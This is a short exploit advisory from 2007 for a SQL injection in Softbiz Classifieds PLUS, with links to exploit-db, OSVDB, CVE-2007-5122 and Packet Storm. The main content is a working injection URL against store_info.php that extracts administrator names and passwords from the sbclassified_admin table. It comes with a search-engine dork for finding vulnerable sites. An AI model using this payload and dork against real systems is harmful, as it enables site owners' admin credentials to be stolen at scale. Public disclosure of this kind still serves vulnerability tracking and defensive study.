Softbiz Classifieds PLUS (id) Remote SQL Injection Vulnerability :: 2007-09-26
##################################################$################################## #### Classifieds SQL INJECTION #### #### BY IRCRASH #### ##################################################################################### # # #AUTHOR : IRCRASH (R3d.w0rm & Dr.Crash) # #Script Download : http://www.softbizscripts.com/ # #DORK: "Powered by SoftbizScripts" inurl:store_info.php # # # # # # # #Injection Adress : http://server.com/store_info.php?id=999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,admin_name,pwd,18,19,20,21,22/**/from/**/sbclassified_admin/* # # # # #Our site : Ircrash.com # # # # # # TNX : GOD # #####################################################################################Download
http://www.exploit-db.com/exploits/4457/
http://osvdb.org/show/osvdb/39623
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5122
http://packetstormsecurity.org/files/59626/softbiz-sql.txt.html